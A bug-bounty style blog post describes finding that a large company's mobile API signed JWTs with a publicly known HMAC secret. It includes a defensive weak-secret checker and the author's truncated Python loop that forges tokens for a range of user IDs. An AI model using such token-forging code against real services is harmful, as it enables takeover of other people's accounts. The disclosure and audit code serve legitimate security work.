Unbelievable Security Hole: JWT Secret in a Series-B Funded Company
A routine penetration test revealed a severe security flaw at a company with 11.8 million users: its mobile API signed JWT tokens with a publicly known secret key. An attacker could exploit this to generate valid tokens and access any user's account, potentially leading to a large-scale data breach. 2025-10-10 11:1:14 Author: infosecwriteups.com

Erkan Kavas

It started as a routine penetration test. Little did I know I was about to uncover one of the most basic yet catastrophic security vulnerabilities imaginable in a company with 11.8 million users and $140 million in Series B funding.

Image by easydmarc.com

While testing their mobile API, Burp Suite flagged something that made me do a double-take:

Critical: JWT signed using well-known HMAC secret key. The key used was: XXXX

My first reaction was disbelief. Surely this had to be a false positive.

The Proof

I decided to verify the finding. Using their own JWT structure:

{
    "iss": "redacted",
    "expwe": 90001760027408,
    "userId": 1813038, (*)
    "iyat": 1760027408,
    "sss": 17460027408
}

With the secret “XXXX”, I generated a token and accessed their /v1/auth/ endpoint. It worked. Then came the terrifying realization: I could access ANY user's account by simply changing the userId parameter.
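The check Burp performed here can be reproduced against tokens your own service issues, which is the defender's first step. This is an added example, not code from the write-up: the candidate secret list and the payload are constructed, and HS256 is assumed since the post only says the token is HMAC-signed.

```python
import base64
import hashlib
import hmac
import json
import secrets

# Constructed list of default/well-known secrets of the kind a scanner tries
# against HMAC-signed tokens; extend it with anything your own repos ever shipped.
WEAK_SECRETS = ["secret", "password", "changeme", "XXXX", "jwt_secret", "123456"]


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hs256_token(payload: dict, secret: str) -> str:
    """Mint an HS256 JWT; used here only to build sample tokens for the audit."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = _b64url_encode(json.dumps(payload).encode())
    sig = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url_encode(sig)}"


def weak_secret_check(token: str, candidates=WEAK_SECRETS):
    """Return the candidate that verifies the token's HMAC, or None if no hit.
    A hit means anyone with that public secret can mint a token for any userId."""
    header_b64, body_b64, sig_b64 = token.split(".")
    if json.loads(_b64url_decode(header_b64)).get("alg") != "HS256":
        return None  # only HMAC-SHA256 tokens are covered here
    signing_input = f"{header_b64}.{body_b64}".encode()
    sig = _b64url_decode(sig_b64)
    for candidate in candidates:
        expected = hmac.new(candidate.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(expected, sig):
            return candidate
    return None


def generate_signing_secret() -> str:
    """256 bits from the OS CSPRNG, the minimum HS256 key size per RFC 7518 §3.2."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    claims = {"iss": "redacted", "userId": 1813038}  # constructed, mirrors the post
    print(weak_secret_check(hs256_token(claims, "XXXX")))
    print(weak_secret_check(hs256_token(claims, generate_signing_secret())))
```

A hit on a production token is a finding on its own; rotate the key to a generated one and invalidate outstanding sessions rather than just removing the offending value from the list.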

The Escalation

I wrote a simple Python script to demonstrate the impact:

import jwt
import requests

SECRET = "XXXX"

for user_id in range(1, 11):
    token = jwt.encode(
        {"iss": "redacted", "expwe": 90001760027408, "userId": user_id,
         "iyat": 1760027408, "sss": 17460027408},
        SECRET,
        algorithm="HS256",  # assumed; the post only says the token is HMAC-signed
    )
    # remainder of the script (the request to the /v1/auth/ endpoint) is truncated in the post


Source: https://infosecwriteups.com/unbelievable-security-hole-jwt-secret-in-a-series-b-funded-company-540434b54e59?source=rss----7b722bfd1b8d--bug_bounty